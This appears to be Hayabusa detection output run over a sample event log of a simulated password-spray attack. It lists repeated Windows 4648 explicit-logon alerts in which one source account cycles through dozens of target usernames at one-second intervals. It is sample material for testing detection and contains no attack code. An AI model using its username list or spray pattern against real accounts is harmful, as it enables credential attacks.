2019-05-01 04:27:26.504 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:27.583 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:28.654 
+09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:29.712 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:30.787 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:31.861 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:32.955 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:34.020 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:35.081 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:36.151 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:37.238 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:38.310 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:39.393 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:40.457 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP 
Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:41.553 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:42.613 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:43.686 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:44.738 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:45.818 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:46.896 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit 
Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:47.953 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:49.019 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:50.082 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:51.156 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:52.214 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:53.285 
+09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:54.354 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:55.438 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:56.513 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:57.578 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:58.661 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:59.721 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:00.795 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:01.865 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:02.941 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:04.015 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:05.097 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP 
Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:06.182 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:07.239 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:08.315 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:09.399 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:10.468 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:11.549 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit 
Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:12.621 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:13.709 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:14.769 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:15.849 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:16.918 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:17.999 
+09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:19.068 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:20.129 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:21.201 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:22.250 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:23.338 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:24.404 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:25.468 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:26.529 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:27.607 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:28.691 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:29.753 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP 
Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:30.838 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:31.910 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:32.983 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:34.067 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:35.146 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:36.239 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | 
LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:37.334 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:38.403 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:39.463 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:40.530 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:41.608 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 
04:28:42.669 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:43.731 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:44.801 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:45.880 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:46.969 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:48.042 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:49.108 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
